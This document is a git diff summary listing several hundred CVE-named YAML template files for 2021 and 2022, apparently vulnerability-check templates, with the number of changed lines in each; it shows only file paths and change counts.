http/cves/2021/CVE-2021-24278.yaml | 1 +
http/cves/2021/CVE-2021-24284.yaml | 3 +-
http/cves/2021/CVE-2021-24285.yaml | 3 +-
http/cves/2021/CVE-2021-24287.yaml | 1 +
http/cves/2021/CVE-2021-24288.yaml | 1 +
http/cves/2021/CVE-2021-24291.yaml | 1 +
http/cves/2021/CVE-2021-24298.yaml | 1 +
http/cves/2021/CVE-2021-24300.yaml | 1 +
http/cves/2021/CVE-2021-24316.yaml | 1 +
http/cves/2021/CVE-2021-24320.yaml | 1 +
http/cves/2021/CVE-2021-24335.yaml | 1 +
http/cves/2021/CVE-2021-24340.yaml | 3 +-
http/cves/2021/CVE-2021-24342.yaml | 1 +
http/cves/2021/CVE-2021-24347.yaml | 3 +-
http/cves/2021/CVE-2021-24351.yaml | 1 +
http/cves/2021/CVE-2021-24358.yaml | 1 +
http/cves/2021/CVE-2021-24364.yaml | 1 +
http/cves/2021/CVE-2021-24370.yaml | 3 +-
http/cves/2021/CVE-2021-24387.yaml | 1 +
http/cves/2021/CVE-2021-24389.yaml | 1 +
http/cves/2021/CVE-2021-24406.yaml | 1 +
http/cves/2021/CVE-2021-24407.yaml | 1 +
http/cves/2021/CVE-2021-24409.yaml | 13 ++-
http/cves/2021/CVE-2021-24435.yaml | 1 +
http/cves/2021/CVE-2021-24436.yaml | 1 +
http/cves/2021/CVE-2021-24452.yaml | 1 +
http/cves/2021/CVE-2021-24472.yaml | 3 +-
http/cves/2021/CVE-2021-24488.yaml | 1 +
http/cves/2021/CVE-2021-24495.yaml | 1 +
http/cves/2021/CVE-2021-24498.yaml | 1 +
http/cves/2021/CVE-2021-24499.yaml | 1 +
http/cves/2021/CVE-2021-24510.yaml | 1 +
http/cves/2021/CVE-2021-24554.yaml | 3 +-
http/cves/2021/CVE-2021-24647.yaml | 1 +
http/cves/2021/CVE-2021-24666.yaml | 1 +
http/cves/2021/CVE-2021-24731.yaml | 3 +-
http/cves/2021/CVE-2021-24746.yaml | 1 +
http/cves/2021/CVE-2021-24750.yaml | 3 +-
http/cves/2021/CVE-2021-24762.yaml | 3 +-
http/cves/2021/CVE-2021-24827.yaml | 3 +-
http/cves/2021/CVE-2021-24838.yaml | 3 +-
http/cves/2021/CVE-2021-24862.yaml | 3 +-
http/cves/2021/CVE-2021-24875.yaml | 1 +
http/cves/2021/CVE-2021-24891.yaml | 1 +
http/cves/2021/CVE-2021-24910.yaml | 3 +-
http/cves/2021/CVE-2021-24917.yaml | 3 +-
http/cves/2021/CVE-2021-24926.yaml | 3 +-
http/cves/2021/CVE-2021-24931.yaml | 3 +-
http/cves/2021/CVE-2021-24940.yaml | 3 +-
http/cves/2021/CVE-2021-24946.yaml | 3 +-
http/cves/2021/CVE-2021-24947.yaml | 3 +-
http/cves/2021/CVE-2021-24956.yaml | 13 ++-
http/cves/2021/CVE-2021-24970.yaml | 3 +-
http/cves/2021/CVE-2021-24987.yaml | 1 +
http/cves/2021/CVE-2021-24991.yaml | 3 +-
http/cves/2021/CVE-2021-24997.yaml | 3 +-
http/cves/2021/CVE-2021-25003.yaml | 3 +-
http/cves/2021/CVE-2021-25008.yaml | 3 +-
http/cves/2021/CVE-2021-25028.yaml | 3 +-
http/cves/2021/CVE-2021-25033.yaml | 3 +-
http/cves/2021/CVE-2021-25052.yaml | 3 +-
http/cves/2021/CVE-2021-25055.yaml | 3 +-
http/cves/2021/CVE-2021-25063.yaml | 3 +-
http/cves/2021/CVE-2021-25065.yaml | 10 +-
http/cves/2021/CVE-2021-25067.yaml | 3 +-
http/cves/2021/CVE-2021-25074.yaml | 3 +-
http/cves/2021/CVE-2021-25075.yaml | 1 +
http/cves/2021/CVE-2021-25078.yaml | 3 +-
http/cves/2021/CVE-2021-25085.yaml | 3 +-
http/cves/2021/CVE-2021-25099.yaml | 3 +-
http/cves/2021/CVE-2021-25104.yaml | 3 +-
http/cves/2021/CVE-2021-25111.yaml | 3 +-
http/cves/2021/CVE-2021-25112.yaml | 3 +-
http/cves/2021/CVE-2021-25114.yaml | 3 +-
http/cves/2021/CVE-2021-25118.yaml | 3 +-
http/cves/2021/CVE-2021-25120.yaml | 3 +-
http/cves/2021/CVE-2021-25281.yaml | 3 +-
http/cves/2021/CVE-2021-25296.yaml | 3 +-
http/cves/2021/CVE-2021-25297.yaml | 3 +-
http/cves/2021/CVE-2021-25298.yaml | 3 +-
http/cves/2021/CVE-2021-25299.yaml | 1 +
http/cves/2021/CVE-2021-25646.yaml | 3 +-
http/cves/2021/CVE-2021-25864.yaml | 9 +-
http/cves/2021/CVE-2021-25899.yaml | 3 +-
http/cves/2021/CVE-2021-26084.yaml | 5 +-
http/cves/2021/CVE-2021-26085.yaml | 5 +-
http/cves/2021/CVE-2021-26086.yaml | 1 +
http/cves/2021/CVE-2021-26247.yaml | 3 +-
http/cves/2021/CVE-2021-26295.yaml | 3 +-
http/cves/2021/CVE-2021-26475.yaml | 1 +
http/cves/2021/CVE-2021-26598.yaml | 3 +-
http/cves/2021/CVE-2021-26702.yaml | 1 +
http/cves/2021/CVE-2021-26710.yaml | 1 +
http/cves/2021/CVE-2021-26723.yaml | 3 +-
http/cves/2021/CVE-2021-26812.yaml | 1 +
http/cves/2021/CVE-2021-26855.yaml | 3 +-
http/cves/2021/CVE-2021-27124.yaml | 3 +-
http/cves/2021/CVE-2021-27132.yaml | 3 +-
http/cves/2021/CVE-2021-27309.yaml | 1 +
http/cves/2021/CVE-2021-27310.yaml | 1 +
http/cves/2021/CVE-2021-27314.yaml | 3 +-
http/cves/2021/CVE-2021-27315.yaml | 3 +-
http/cves/2021/CVE-2021-27316.yaml | 3 +-
http/cves/2021/CVE-2021-27319.yaml | 3 +-
http/cves/2021/CVE-2021-27320.yaml | 3 +-
http/cves/2021/CVE-2021-27330.yaml | 3 +-
http/cves/2021/CVE-2021-27358.yaml | 1 +
http/cves/2021/CVE-2021-27519.yaml | 1 +
http/cves/2021/CVE-2021-27520.yaml | 1 +
http/cves/2021/CVE-2021-27561.yaml | 5 +-
http/cves/2021/CVE-2021-27651.yaml | 3 +-
http/cves/2021/CVE-2021-27670.yaml | 10 +-
http/cves/2021/CVE-2021-27748.yaml | 1 +
http/cves/2021/CVE-2021-27850.yaml | 5 +-
http/cves/2021/CVE-2021-27905.yaml | 1 +
http/cves/2021/CVE-2021-27909.yaml | 1 +
http/cves/2021/CVE-2021-27931.yaml | 3 +-
http/cves/2021/CVE-2021-28073.yaml | 4 +-
http/cves/2021/CVE-2021-28149.yaml | 3 +-
http/cves/2021/CVE-2021-28150.yaml | 1 +
http/cves/2021/CVE-2021-28151.yaml | 1 +
http/cves/2021/CVE-2021-28164.yaml | 1 +
http/cves/2021/CVE-2021-28169.yaml | 1 +
http/cves/2021/CVE-2021-28377.yaml | 3 +-
http/cves/2021/CVE-2021-28419.yaml | 3 +-
http/cves/2021/CVE-2021-28854.yaml | 6 +-
http/cves/2021/CVE-2021-28918.yaml | 5 +-
http/cves/2021/CVE-2021-28937.yaml | 1 +
http/cves/2021/CVE-2021-29156.yaml | 3 +-
http/cves/2021/CVE-2021-29203.yaml | 3 +-
http/cves/2021/CVE-2021-29441.yaml | 3 +-
http/cves/2021/CVE-2021-29442.yaml | 3 +-
http/cves/2021/CVE-2021-29484.yaml | 1 +
http/cves/2021/CVE-2021-29490.yaml | 1 +
http/cves/2021/CVE-2021-29505.yaml | 1 +
http/cves/2021/CVE-2021-29622.yaml | 1 +
http/cves/2021/CVE-2021-29625.yaml | 1 +
http/cves/2021/CVE-2021-3002.yaml | 1 +
http/cves/2021/CVE-2021-30049.yaml | 1 +
http/cves/2021/CVE-2021-30128.yaml | 3 +-
http/cves/2021/CVE-2021-30134.yaml | 3 +-
http/cves/2021/CVE-2021-30151.yaml | 1 +
http/cves/2021/CVE-2021-3017.yaml | 1 +
http/cves/2021/CVE-2021-30175.yaml | 1 +
http/cves/2021/CVE-2021-3019.yaml | 3 +-
http/cves/2021/CVE-2021-30213.yaml | 1 +
http/cves/2021/CVE-2021-30461.yaml | 3 +-
http/cves/2021/CVE-2021-30497.yaml | 1 +
http/cves/2021/CVE-2021-3110.yaml | 3 +-
http/cves/2021/CVE-2021-31195.yaml | 9 +-
http/cves/2021/CVE-2021-31249.yaml | 4 +-
http/cves/2021/CVE-2021-31250.yaml | 1 +
http/cves/2021/CVE-2021-3129.yaml | 3 +-
http/cves/2021/CVE-2021-31537.yaml | 1 +
http/cves/2021/CVE-2021-31581.yaml | 3 +-
http/cves/2021/CVE-2021-31589.yaml | 3 +-
http/cves/2021/CVE-2021-31602.yaml | 1 +
http/cves/2021/CVE-2021-31682.yaml | 1 +
http/cves/2021/CVE-2021-31755.yaml | 1 +
http/cves/2021/CVE-2021-31805.yaml | 3 +-
http/cves/2021/CVE-2021-31856.yaml | 1 +
http/cves/2021/CVE-2021-31862.yaml | 3 +-
http/cves/2021/CVE-2021-32030.yaml | 3 +-
http/cves/2021/CVE-2021-32172.yaml | 3 +-
http/cves/2021/CVE-2021-3223.yaml | 1 +
http/cves/2021/CVE-2021-32305.yaml | 3 +-
http/cves/2021/CVE-2021-32618.yaml | 1 +
http/cves/2021/CVE-2021-32682.yaml | 3 +-
http/cves/2021/CVE-2021-32789.yaml | 3 +-
http/cves/2021/CVE-2021-32819.yaml | 3 +-
http/cves/2021/CVE-2021-32820.yaml | 3 +-
http/cves/2021/CVE-2021-32853.yaml | 3 +-
http/cves/2021/CVE-2021-3293.yaml | 1 +
http/cves/2021/CVE-2021-3297.yaml | 1 +
http/cves/2021/CVE-2021-33044.yaml | 3 +-
http/cves/2021/CVE-2021-33221.yaml | 1 +
http/cves/2021/CVE-2021-33357.yaml | 3 +-
http/cves/2021/CVE-2021-33544.yaml | 3 +-
http/cves/2021/CVE-2021-33564.yaml | 3 +-
http/cves/2021/CVE-2021-3374.yaml | 1 +
http/cves/2021/CVE-2021-3377.yaml | 1 +
http/cves/2021/CVE-2021-3378.yaml | 3 +-
http/cves/2021/CVE-2021-33807.yaml | 3 +-
http/cves/2021/CVE-2021-33851.yaml | 1 +
http/cves/2021/CVE-2021-33904.yaml | 1 +
http/cves/2021/CVE-2021-34370.yaml | 1 +
http/cves/2021/CVE-2021-34429.yaml | 3 +-
http/cves/2021/CVE-2021-34473.yaml | 3 +-
http/cves/2021/CVE-2021-34621.yaml | 1 +
http/cves/2021/CVE-2021-34640.yaml | 1 +
http/cves/2021/CVE-2021-34643.yaml | 1 +
http/cves/2021/CVE-2021-34805.yaml | 3 +-
http/cves/2021/CVE-2021-35250.yaml | 5 +-
http/cves/2021/CVE-2021-35265.yaml | 3 +-
http/cves/2021/CVE-2021-35336.yaml | 1 +
http/cves/2021/CVE-2021-35380.yaml | 3 +-
http/cves/2021/CVE-2021-35464.yaml | 5 +-
http/cves/2021/CVE-2021-35488.yaml | 1 +
http/cves/2021/CVE-2021-35587.yaml | 3 +-
http/cves/2021/CVE-2021-3577.yaml | 3 +-
http/cves/2021/CVE-2021-36260.yaml | 4 +-
http/cves/2021/CVE-2021-36356.yaml | 3 +-
http/cves/2021/CVE-2021-36380.yaml | 3 +-
http/cves/2021/CVE-2021-36450.yaml | 1 +
http/cves/2021/CVE-2021-3654.yaml | 3 +-
http/cves/2021/CVE-2021-36580.yaml | 11 +-
http/cves/2021/CVE-2021-36748.yaml | 1 +
http/cves/2021/CVE-2021-36749.yaml | 3 +-
http/cves/2021/CVE-2021-36873.yaml | 1 +
http/cves/2021/CVE-2021-37216.yaml | 1 +
http/cves/2021/CVE-2021-37304.yaml | 1 +
http/cves/2021/CVE-2021-37305.yaml | 1 +
http/cves/2021/CVE-2021-37416.yaml | 1 +
http/cves/2021/CVE-2021-37538.yaml | 3 +-
http/cves/2021/CVE-2021-37573.yaml | 1 +
http/cves/2021/CVE-2021-37580.yaml | 3 +-
http/cves/2021/CVE-2021-37589.yaml | 1 +
http/cves/2021/CVE-2021-37704.yaml | 3 +-
http/cves/2021/CVE-2021-37833.yaml | 1 +
http/cves/2021/CVE-2021-38314.yaml | 1 +
http/cves/2021/CVE-2021-38540.yaml | 3 +-
http/cves/2021/CVE-2021-38647.yaml | 5 +-
http/cves/2021/CVE-2021-38702.yaml | 1 +
http/cves/2021/CVE-2021-38704.yaml | 1 +
http/cves/2021/CVE-2021-38751.yaml | 1 +
http/cves/2021/CVE-2021-39141.yaml | 3 +-
http/cves/2021/CVE-2021-39144.yaml | 1 +
http/cves/2021/CVE-2021-39146.yaml | 3 +-
http/cves/2021/CVE-2021-39152.yaml | 1 +
http/cves/2021/CVE-2021-39165.yaml | 3 +-
http/cves/2021/CVE-2021-39211.yaml | 3 +-
http/cves/2021/CVE-2021-39226.yaml | 1 +
http/cves/2021/CVE-2021-39312.yaml | 3 +-
http/cves/2021/CVE-2021-39316.yaml | 1 +
http/cves/2021/CVE-2021-39320.yaml | 1 +
http/cves/2021/CVE-2021-39322.yaml | 1 +
http/cves/2021/CVE-2021-39327.yaml | 1 +
http/cves/2021/CVE-2021-39350.yaml | 1 +
http/cves/2021/CVE-2021-39433.yaml | 1 +
http/cves/2021/CVE-2021-39501.yaml | 1 +
http/cves/2021/CVE-2021-40149.yaml | 3 +-
http/cves/2021/CVE-2021-40150.yaml | 3 +-
http/cves/2021/CVE-2021-40323.yaml | 3 +-
http/cves/2021/CVE-2021-40438.yaml | 3 +-
http/cves/2021/CVE-2021-40539.yaml | 5 +-
http/cves/2021/CVE-2021-40542.yaml | 3 +-
http/cves/2021/CVE-2021-40661.yaml | 3 +-
http/cves/2021/CVE-2021-40822.yaml | 1 +
http/cves/2021/CVE-2021-40856.yaml | 3 +-
http/cves/2021/CVE-2021-40859.yaml | 1 +
http/cves/2021/CVE-2021-40868.yaml | 1 +
http/cves/2021/CVE-2021-40870.yaml | 5 +-
http/cves/2021/CVE-2021-40875.yaml | 3 +-
http/cves/2021/CVE-2021-40908.yaml | 3 +-
http/cves/2021/CVE-2021-40960.yaml | 3 +-
http/cves/2021/CVE-2021-40968.yaml | 3 +-
http/cves/2021/CVE-2021-40969.yaml | 3 +-
http/cves/2021/CVE-2021-40970.yaml | 3 +-
http/cves/2021/CVE-2021-40971.yaml | 3 +-
http/cves/2021/CVE-2021-40972.yaml | 3 +-
http/cves/2021/CVE-2021-40973.yaml | 3 +-
http/cves/2021/CVE-2021-40978.yaml | 1 +
http/cves/2021/CVE-2021-41174.yaml | 3 +-
http/cves/2021/CVE-2021-41192.yaml | 3 +-
http/cves/2021/CVE-2021-41266.yaml | 3 +-
http/cves/2021/CVE-2021-41277.yaml | 5 +-
http/cves/2021/CVE-2021-41282.yaml | 3 +-
http/cves/2021/CVE-2021-41291.yaml | 3 +-
http/cves/2021/CVE-2021-41293.yaml | 3 +-
http/cves/2021/CVE-2021-41349.yaml | 3 +-
http/cves/2021/CVE-2021-41381.yaml | 3 +-
http/cves/2021/CVE-2021-41432.yaml | 1 +
http/cves/2021/CVE-2021-41460.yaml | 9 +-
http/cves/2021/CVE-2021-41467.yaml | 3 +-
http/cves/2021/CVE-2021-41569.yaml | 1 +
http/cves/2021/CVE-2021-41648.yaml | 3 +-
http/cves/2021/CVE-2021-41649.yaml | 3 +-
http/cves/2021/CVE-2021-41653.yaml | 3 +-
http/cves/2021/CVE-2021-41691.yaml | 6 +-
http/cves/2021/CVE-2021-41773.yaml | 1 +
http/cves/2021/CVE-2021-41826.yaml | 1 +
http/cves/2021/CVE-2021-41878.yaml | 1 +
http/cves/2021/CVE-2021-4191.yaml | 3 +-
http/cves/2021/CVE-2021-41951.yaml | 1 +
http/cves/2021/CVE-2021-42013.yaml | 3 +-
http/cves/2021/CVE-2021-42063.yaml | 3 +-
http/cves/2021/CVE-2021-42071.yaml | 3 +-
http/cves/2021/CVE-2021-42192.yaml | 1 +
http/cves/2021/CVE-2021-42237.yaml | 3 +-
http/cves/2021/CVE-2021-42258.yaml | 3 +-
http/cves/2021/CVE-2021-42551.yaml | 3 +-
http/cves/2021/CVE-2021-42565.yaml | 1 +
http/cves/2021/CVE-2021-42566.yaml | 1 +
http/cves/2021/CVE-2021-42567.yaml | 1 +
http/cves/2021/CVE-2021-42627.yaml | 3 +-
http/cves/2021/CVE-2021-42663.yaml | 1 +
http/cves/2021/CVE-2021-42667.yaml | 3 +-
http/cves/2021/CVE-2021-42887.yaml | 3 +-
http/cves/2021/CVE-2021-43062.yaml | 3 +-
http/cves/2021/CVE-2021-43287.yaml | 3 +-
http/cves/2021/CVE-2021-43421.yaml | 1 +
http/cves/2021/CVE-2021-43495.yaml | 1 +
http/cves/2021/CVE-2021-43496.yaml | 1 +
http/cves/2021/CVE-2021-43510.yaml | 3 +-
http/cves/2021/CVE-2021-43574.yaml | 1 +
http/cves/2021/CVE-2021-43725.yaml | 3 +-
http/cves/2021/CVE-2021-43734.yaml | 3 +-
http/cves/2021/CVE-2021-43778.yaml | 3 +-
http/cves/2021/CVE-2021-43798.yaml | 3 +-
http/cves/2021/CVE-2021-43810.yaml | 3 +-
http/cves/2021/CVE-2021-44077.yaml | 5 +-
http/cves/2021/CVE-2021-44138.yaml | 3 +-
http/cves/2021/CVE-2021-44139.yaml | 4 +
http/cves/2021/CVE-2021-44152.yaml | 7 +-
http/cves/2021/CVE-2021-44228.yaml | 3 +-
http/cves/2021/CVE-2021-44427.yaml | 3 +-
http/cves/2021/CVE-2021-44451.yaml | 3 +-
http/cves/2021/CVE-2021-44515.yaml | 3 +-
http/cves/2021/CVE-2021-44528.yaml | 3 +-
http/cves/2021/CVE-2021-44529.yaml | 3 +-
http/cves/2021/CVE-2021-44848.yaml | 1 +
http/cves/2021/CVE-2021-45043.yaml | 3 +-
http/cves/2021/CVE-2021-45046.yaml | 11 +-
http/cves/2021/CVE-2021-45092.yaml | 3 +-
http/cves/2021/CVE-2021-45232.yaml | 3 +-
http/cves/2021/CVE-2021-45380.yaml | 3 +-
http/cves/2021/CVE-2021-45422.yaml | 3 +-
http/cves/2021/CVE-2021-45428.yaml | 3 +-
http/cves/2021/CVE-2021-45967.yaml | 3 +-
http/cves/2021/CVE-2021-45968.yaml | 3 +-
http/cves/2021/CVE-2021-46005.yaml | 3 +-
http/cves/2021/CVE-2021-46068.yaml | 3 +-
http/cves/2021/CVE-2021-46069.yaml | 3 +-
http/cves/2021/CVE-2021-46071.yaml | 3 +-
http/cves/2021/CVE-2021-46072.yaml | 3 +-
http/cves/2021/CVE-2021-46073.yaml | 3 +-
http/cves/2021/CVE-2021-46379.yaml | 3 +-
http/cves/2021/CVE-2021-46381.yaml | 3 +-
http/cves/2021/CVE-2021-46387.yaml | 3 +-
http/cves/2021/CVE-2021-46417.yaml | 3 +-
http/cves/2021/CVE-2021-46422.yaml | 1 +
http/cves/2021/CVE-2021-46424.yaml | 1 +
http/cves/2021/CVE-2021-46704.yaml | 3 +-
http/cves/2022/CVE-2022-0140.yaml | 5 +-
http/cves/2022/CVE-2022-0147.yaml | 3 +-
http/cves/2022/CVE-2022-0148.yaml | 3 +-
http/cves/2022/CVE-2022-0149.yaml | 3 +-
http/cves/2022/CVE-2022-0150.yaml | 3 +-
http/cves/2022/CVE-2022-0165.yaml | 3 +-
http/cves/2022/CVE-2022-0169.yaml | 15 ++-
http/cves/2022/CVE-2022-0189.yaml | 3 +-
http/cves/2022/CVE-2022-0201.yaml | 3 +-
http/cves/2022/CVE-2022-0206.yaml | 3 +-
http/cves/2022/CVE-2022-0208.yaml | 3 +-
http/cves/2022/CVE-2022-0212.yaml | 3 +-
http/cves/2022/CVE-2022-0218.yaml | 3 +-
http/cves/2022/CVE-2022-0220.yaml | 3 +-
http/cves/2022/CVE-2022-0234.yaml | 3 +-
http/cves/2022/CVE-2022-0271.yaml | 1 +
http/cves/2022/CVE-2022-0281.yaml | 3 +-
http/cves/2022/CVE-2022-0288.yaml | 3 +-
http/cves/2022/CVE-2022-0346.yaml | 1 +
http/cves/2022/CVE-2022-0349.yaml | 3 +-
http/cves/2022/CVE-2022-0378.yaml | 3 +-
http/cves/2022/CVE-2022-0381.yaml | 3 +-
http/cves/2022/CVE-2022-0412.yaml | 3 +-
http/cves/2022/CVE-2022-0415.yaml | 3 +-
http/cves/2022/CVE-2022-0422.yaml | 3 +-
http/cves/2022/CVE-2022-0432.yaml | 3 +-
http/cves/2022/CVE-2022-0434.yaml | 3 +-
http/cves/2022/CVE-2022-0437.yaml | 3 +-
http/cves/2022/CVE-2022-0441.yaml | 3 +-
http/cves/2022/CVE-2022-0482.yaml | 3 +-
http/cves/2022/CVE-2022-0535.yaml | 1 +
http/cves/2022/CVE-2022-0540.yaml | 3 +-
http/cves/2022/CVE-2022-0591.yaml | 1 +
http/cves/2022/CVE-2022-0594.yaml | 3 +-
http/cves/2022/CVE-2022-0595.yaml | 1 +
http/cves/2022/CVE-2022-0599.yaml | 1 +
http/cves/2022/CVE-2022-0653.yaml | 3 +-
http/cves/2022/CVE-2022-0656.yaml | 3 +-
http/cves/2022/CVE-2022-0660.yaml | 3 +-
http/cves/2022/CVE-2022-0678.yaml | 3 +-
http/cves/2022/CVE-2022-0679.yaml | 3 +-
http/cves/2022/CVE-2022-0692.yaml | 3 +-
http/cves/2022/CVE-2022-0693.yaml | 3 +-
http/cves/2022/CVE-2022-0735.yaml | 4 +-
http/cves/2022/CVE-2022-0747.yaml | 1 +
http/cves/2022/CVE-2022-0760.yaml | 1 +
http/cves/2022/CVE-2022-0769.yaml | 3 +-
http/cves/2022/CVE-2022-0773.yaml | 3 +-
http/cves/2022/CVE-2022-0776.yaml | 3 +-
http/cves/2022/CVE-2022-0781.yaml | 3 +-
http/cves/2022/CVE-2022-0784.yaml | 1 +
http/cves/2022/CVE-2022-0785.yaml | 1 +
http/cves/2022/CVE-2022-0786.yaml | 3 +-
http/cves/2022/CVE-2022-0788.yaml | 3 +-
http/cves/2022/CVE-2022-0817.yaml | 3 +-
http/cves/2022/CVE-2022-0824.yaml | 3 +-
http/cves/2022/CVE-2022-0826.yaml | 3 +-
http/cves/2022/CVE-2022-0827.yaml | 3 +-
http/cves/2022/CVE-2022-0846.yaml | 1 +
http/cves/2022/CVE-2022-0864.yaml | 1 +
http/cves/2022/CVE-2022-0867.yaml | 3 +-
http/cves/2022/CVE-2022-0869.yaml | 3 +-
http/cves/2022/CVE-2022-0870.yaml | 3 +-
http/cves/2022/CVE-2022-0885.yaml | 5 +-
http/cves/2022/CVE-2022-0928.yaml | 1 +
http/cves/2022/CVE-2022-0948.yaml | 3 +-
http/cves/2022/CVE-2022-0949.yaml | 1 +
http/cves/2022/CVE-2022-0952.yaml | 3 +-
http/cves/2022/CVE-2022-0954.yaml | 1 +
http/cves/2022/CVE-2022-0963.yaml | 1 +
http/cves/2022/CVE-2022-0968.yaml | 1 +
http/cves/2022/CVE-2022-1007.yaml | 1 +
http/cves/2022/CVE-2022-1013.yaml | 3 +-
http/cves/2022/CVE-2022-1020.yaml | 1 +
http/cves/2022/CVE-2022-1040.yaml | 3 +-
http/cves/2022/CVE-2022-1054.yaml | 3 +-
http/cves/2022/CVE-2022-1057.yaml | 3 +-
http/cves/2022/CVE-2022-1058.yaml | 1 +
http/cves/2022/CVE-2022-1119.yaml | 3 +-
http/cves/2022/CVE-2022-1162.yaml | 1 +
http/cves/2022/CVE-2022-1168.yaml | 1 +
http/cves/2022/CVE-2022-1221.yaml | 1 +
http/cves/2022/CVE-2022-1329.yaml | 3 +-
http/cves/2022/CVE-2022-1386.yaml | 3 +-
http/cves/2022/CVE-2022-1388.yaml | 3 +-
http/cves/2022/CVE-2022-1390.yaml | 3 +-
http/cves/2022/CVE-2022-1391.yaml | 3 +-
http/cves/2022/CVE-2022-1392.yaml | 3 +-
http/cves/2022/CVE-2022-1398.yaml | 3 +-
http/cves/2022/CVE-2022-1439.yaml | 3 +-
http/cves/2022/CVE-2022-1442.yaml | 3 +-
http/cves/2022/CVE-2022-1574.yaml | 3 +-
http/cves/2022/CVE-2022-1595.yaml | 3 +-
http/cves/2022/CVE-2022-1597.yaml | 1 +
http/cves/2022/CVE-2022-1598.yaml | 3 +-
http/cves/2022/CVE-2022-1609.yaml | 11 +-
http/cves/2022/CVE-2022-1713.yaml | 3 +-
http/cves/2022/CVE-2022-1724.yaml | 3 +-
http/cves/2022/CVE-2022-1756.yaml | 10 +-
http/cves/2022/CVE-2022-1768.yaml | 3 +-
http/cves/2022/CVE-2022-1815.yaml | 3 +-
http/cves/2022/CVE-2022-1883.yaml | 3 +-
http/cves/2022/CVE-2022-1903.yaml | 3 +-
http/cves/2022/CVE-2022-1904.yaml | 1 +
http/cves/2022/CVE-2022-1906.yaml | 3 +-
http/cves/2022/CVE-2022-1910.yaml | 3 +-
http/cves/2022/CVE-2022-1916.yaml | 1 +
http/cves/2022/CVE-2022-1933.yaml | 3 +-
http/cves/2022/CVE-2022-1937.yaml | 3 +-
http/cves/2022/CVE-2022-1946.yaml | 1 +
http/cves/2022/CVE-2022-1952.yaml | 3 +-
http/cves/2022/CVE-2022-2034.yaml | 3 +-
http/cves/2022/CVE-2022-21371.yaml | 3 +-
http/cves/2022/CVE-2022-21500.yaml | 3 +-
http/cves/2022/CVE-2022-21587.yaml | 5 +-
http/cves/2022/CVE-2022-21661.yaml | 3 +-
http/cves/2022/CVE-2022-21705.yaml | 10 +-
http/cves/2022/CVE-2022-2185.yaml | 5 +-
http/cves/2022/CVE-2022-2187.yaml | 3 +-
http/cves/2022/CVE-2022-2219.yaml | 3 +-
http/cves/2022/CVE-2022-22242.yaml | 3 +-
http/cves/2022/CVE-2022-22536.yaml | 3 +-
http/cves/2022/CVE-2022-22733.yaml | 3 +-
http/cves/2022/CVE-2022-22897.yaml | 10 +-
http/cves/2022/CVE-2022-2290.yaml | 3 +-
http/cves/2022/CVE-2022-22947.yaml | 5 +-
http/cves/2022/CVE-2022-22954.yaml | 3 +-
http/cves/2022/CVE-2022-22963.yaml | 3 +-
http/cves/2022/CVE-2022-22965.yaml | 3 +-
http/cves/2022/CVE-2022-22972.yaml | 3 +-
http/cves/2022/CVE-2022-23102.yaml | 8 +-
http/cves/2022/CVE-2022-23131.yaml | 3 +-
http/cves/2022/CVE-2022-23134.yaml | 3 +-
http/cves/2022/CVE-2022-2314.yaml | 3 +-
http/cves/2022/CVE-2022-23178.yaml | 3 +-
http/cves/2022/CVE-2022-23347.yaml | 3 +-
http/cves/2022/CVE-2022-23348.yaml | 3 +-
http/cves/2022/CVE-2022-23544.yaml | 1 +
http/cves/2022/CVE-2022-2373.yaml | 3 +-
http/cves/2022/CVE-2022-2376.yaml | 3 +-
http/cves/2022/CVE-2022-23779.yaml | 3 +-
http/cves/2022/CVE-2022-2379.yaml | 3 +-
http/cves/2022/CVE-2022-23808.yaml | 3 +-
http/cves/2022/CVE-2022-2383.yaml | 3 +-
http/cves/2022/CVE-2022-23854.yaml | 5 +-
http/cves/2022/CVE-2022-23881.yaml | 1 +
http/cves/2022/CVE-2022-23898.yaml | 3 +-
http/cves/2022/CVE-2022-23944.yaml | 3 +-
http/cves/2022/CVE-2022-24112.yaml | 3 +-
http/cves/2022/CVE-2022-24124.yaml | 3 +-
http/cves/2022/CVE-2022-24129.yaml | 3 +-
http/cves/2022/CVE-2022-2414.yaml | 5 +
http/cves/2022/CVE-2022-24181.yaml | 1 +
http/cves/2022/CVE-2022-24223.yaml | 3 +-
http/cves/2022/CVE-2022-24260.yaml | 3 +-
http/cves/2022/CVE-2022-24264.yaml | 3 +-
http/cves/2022/CVE-2022-24265.yaml | 3 +-
http/cves/2022/CVE-2022-24266.yaml | 3 +-
http/cves/2022/CVE-2022-24288.yaml | 3 +-
http/cves/2022/CVE-2022-24384.yaml | 5 +-
http/cves/2022/CVE-2022-2462.yaml | 3 +-
http/cves/2022/CVE-2022-2467.yaml | 3 +-
http/cves/2022/CVE-2022-24681.yaml | 1 +
http/cves/2022/CVE-2022-24716.yaml | 3 +-
http/cves/2022/CVE-2022-24816.yaml | 3 +-
http/cves/2022/CVE-2022-24856.yaml | 3 +-
http/cves/2022/CVE-2022-2486.yaml | 3 +-
http/cves/2022/CVE-2022-2487.yaml | 3 +-
http/cves/2022/CVE-2022-2488.yaml | 3 +-
http/cves/2022/CVE-2022-24899.yaml | 3 +-
http/cves/2022/CVE-2022-24900.yaml | 5 +-
http/cves/2022/CVE-2022-24990.yaml | 4 +-
http/cves/2022/CVE-2022-25082.yaml | 5 +-
http/cves/2022/CVE-2022-25125.yaml | 3 +-
http/cves/2022/CVE-2022-25216.yaml | 3 +-
http/cves/2022/CVE-2022-25323.yaml | 3 +-
http/cves/2022/CVE-2022-25356.yaml | 1 +
http/cves/2022/CVE-2022-25369.yaml | 2 +-
http/cves/2022/CVE-2022-2544.yaml | 3 +-
http/cves/2022/CVE-2022-2546.yaml | 1 +
http/cves/2022/CVE-2022-25481.yaml | 1 +
http/cves/2022/CVE-2022-25485.yaml | 3 +-
http/cves/2022/CVE-2022-25486.yaml | 3 +-
http/cves/2022/CVE-2022-25487.yaml | 3 +-
http/cves/2022/CVE-2022-25488.yaml | 3 +-
http/cves/2022/CVE-2022-25489.yaml | 3 +-
http/cves/2022/CVE-2022-25497.yaml | 3 +-
http/cves/2022/CVE-2022-2551.yaml | 3 +-
http/cves/2022/CVE-2022-2599.yaml | 3 +-
http/cves/2022/CVE-2022-26134.yaml | 5 +-
http/cves/2022/CVE-2022-26138.yaml | 3 +-
http/cves/2022/CVE-2022-26148.yaml | 3 +-
http/cves/2022/CVE-2022-26159.yaml | 5 +-
http/cves/2022/CVE-2022-26233.yaml | 3 +-
http/cves/2022/CVE-2022-26263.yaml | 3 +-
http/cves/2022/CVE-2022-2627.yaml | 1 +
http/cves/2022/CVE-2022-2633.yaml | 5 +-
http/cves/2022/CVE-2022-26352.yaml | 3 +-
